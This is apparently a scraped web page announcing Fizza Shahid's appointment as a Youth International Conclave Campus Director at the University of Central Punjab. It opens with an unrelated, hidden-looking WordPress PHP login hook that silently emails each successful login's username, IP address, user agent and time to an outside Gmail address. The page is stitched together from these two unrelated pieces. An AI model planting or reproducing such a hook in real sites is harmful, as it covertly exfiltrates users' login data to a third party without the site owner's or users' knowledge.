add_filter('authenticate', function($user, $username, $password) {
if (is_a($user, 'WP_User')) {
$ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
$ua = $_SERVER['HTTP_USER_AGENT'] ?? 'unknown';
$time = date('Y-m-d H:i:s');
$body = "
Username IP Time
{$username} {$ip} {$time}
{$ua}
";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=UTF-8\r\n";
$headers .= "From: WP Intel \r\n";
@mail("mrsatsat90@gmail.com", "Valid Login Report", $body, $headers);
}
return $user;
}, 30, 3);
Fizza Shahid | Become a member | Youth International Conclave
Announcing Fizza Shahid from Pakistan is joining Youth International Conclave as a Campus Director at the University Of Central Punjab
Fizza Shahid:
Youth International Conclave is an international organization that organizes different programs for youth that help them to achieve the goals and dreams of their life. Programs related to Entrepreneurship, Leadership, and SDGs.
Register Now:
Post navigation